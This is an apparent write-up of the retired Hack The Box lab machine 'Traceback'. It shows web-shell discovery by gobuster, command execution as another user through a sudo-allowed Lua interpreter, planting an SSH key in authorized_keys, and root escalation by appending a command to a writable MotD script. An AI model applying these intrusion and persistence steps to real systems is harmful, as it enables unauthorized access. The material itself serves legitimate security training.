Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Machine info

Traceback [by Xh4H]
IP: 10.10.10.181
OS: Linux
Difficulty: Easy
Points: 20
Release: 14 Mar 2020

Gain a foothold

As usual we kick off with a nmap scan of the box

# Nmap 7.80 scan initiated Tue Mar 17 22:53:43 2020 as: nmap -v -sC -A -T4 -oA notes/nmap_initial 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: "Help us"
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 17 22:54:29 2020 -- 1 IP address (1 host up) scanned in 46.20 seconds

Ports 22 and 80 are open. Let’s start with checking the website.

Defaced homepage
Defaced homepage

By the looks of it, our target has already been hacked and had its homepage defaced.

In the source code of the defaced home page, we find a reference to the use of a web shell.

<!-- Some of the best web shells that you might need ;) -->

We combine this info, with the nickname used by the hacker, in an online search.
Let’s try Xh4H web shell.

One of the hits leads us to a Github repository.
Note the repo’s description: Some of the best web shells that you might need

This repo is a collection of web shells.

Cloning the repo, we can easily list its contents and create a wordlist. We can then use this wordlist to check whether our hacker used one of these shells.

$ git clone https://github.com/Xh4H/Web-Shells.git
$ ls Web-Shells | tee wordlist-shells.lst
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punkholic.php
punk-nopass.php
r57.php
README.md
smevk.php
wso2.8.5.php

$ gobuster -w wordlist-shells.lst -u http://10.10.10.181/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.181/
[+] Threads      : 10
[+] Wordlist     : wordlist-shells.lst
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2020/03/23 17:26:38 Starting gobuster
=====================================================
/smevk.php (Status: 200)

Looks like our hacker used the SmEvK_PaThAn Shell.

Web shell
Web shell

We find the login credentials in the source code.

The shell contains loads of functionality, one of which is a console.
We can use this console to execute commands as the user running the web shell.

$ whoami
webadmin

$ pwd
/var/www/html

Own user

In the user’s home folder, we find a note left by the sysadmin.

$ cat /home/webadmin/note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

We also discover that the user can execute a script as this sysadmin. Using sudo and passing the -u parameter, we can then execute this program.

$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

$ sudo /home/sysadmin/luvit 2>&1
sudo: no tty present and no askpass program specified

$ sudo -u sysadmin /home/sysadmin/luvit 2>&1
Welcome to the [0mL[0muv[0mit[0m repl!
> Uncaught exception:
[string "bundle:deps/readline.lua"]:485: attempt to call method 'set_mode' (a nil value)
stack traceback:
	[string "bundle:deps/readline.lua"]:485: in function 'readLine'
	[string "bundle:deps/repl.lua"]:198: in function 'start'
	[string "bundle:main.lua"]:137: in function 'main'
	[string "bundle:init.lua"]:49: in function <[string "bundle:init.lua"]:47>
	[C]: in function 'xpcall'
	[string "bundle:init.lua"]:47: in function 'fn'
	[string "bundle:deps/require.lua"]:310: in function <[string "bundle:deps/require.lua"]:266>

Combining the intel from the sysadmin’s note and the tool we’ve discovered, we can assume that luvit is a Lua interpreter. This could allow us to write scripts, perhaps even gaining access to the sysadmin account?

Let’s write a simple script to test our theory.
Note that I use Shared Memory to store my scripts, to avoid polluting the system.

$ echo 'print("hello world")' > /dev/shm/hello.lua
$ cat /dev/shm/hello.lua
print("hello world")
$ sudo -u sysadmin /home/sysadmin/luvit /dev/shm/hello.lua 2>&1
hello world

Checking who we’re executing scripts as.

$ echo 'os.execute("whoami")' > /dev/shm/hello.lua; sudo -u sysadmin /home/sysadmin/luvit /dev/shm/hello.lua 2>&1; rm /dev/shm/hello.lua
sysadmin

Let’s try to find the user’s flag.

$ echo 'os.execute("ls ~")' > /dev/shm/hello.lua
$ sudo -u sysadmin /home/sysadmin/luvit /dev/shm/hello.lua 2>&1
luvit
user.txt

$ echo 'os.execute("cat ~/user.txt")' > /dev/shm/hello.lua
$ sudo -u sysadmin /home/sysadmin/luvit /dev/shm/hello.lua 2>&1
c24[...]020

Don’t forget to clean up!

$ rm /dev/shm/hello.lua

Privesc (root)

Let’s make it easier to ourselves to work on the box by granting ourselves SSH access.

# On our box
$ ssh-keygen -b 2048 -t rsa -C globemarssociety -f ./id_traceback
$ cat ./id_traceback
ssh-rsa AAAAB[...]EitYfvF4f # copy this to clipboard

# Shell
$ echo 'os.execute("echo ssh-rsa AAAAB[...]EitYfvF4f globemarssociety >> /home/sysadmin/.ssh/authorized_keys")' > /dev/shm/hello.lua
$ sudo -u sysadmin /home/sysadmin/luvit /dev/shm/hello.lua 2>&1
$ rm /dev/shm/hello.lua

# On our box
$ ssh -i id_traceback sysadmin@10.10.10.181

#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

It looks like the MotD has also been hijacked by the hacker who defaced the website.

As part of our recon, we look for files writable by our user (sysadmin), in particular files that are also owned by root. We find that the Message of the Day (MotD) files can be modified by our user and are owned by root.

sysadmin@traceback:~$ find / -writable 2>/dev/null

sysadmin@traceback:~$ ls -al /etc/update-motd.d/
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Mar 17 19:30 00-header
-rwxrwxr-x  1 root sysadmin  982 Mar 17 19:30 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Mar 17 19:30 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Mar 17 19:30 80-esm
-rwxrwxr-x  1 root sysadmin  299 Mar 17 19:30 91-release-upgrade

We add a line to the MotD which will print the content of /root/root.txt which is where we usually find the root flag.

Note that to exploit this, we’ll have to be quick. There’s a script that resets the MotD to it’s default value after a user logged in (You can see this running pspy for a while and logging in from a 2nd session).
So make sure you have a second terminal window open, ready to SSH into the box as soon as you’ve executed the first command.

# In our current SSH shell
echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

# In the 2nd terminal
$ ssh -i id_traceback sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

ccd[...]5d6

There we have it :)

A very pleasant box by Xh4H!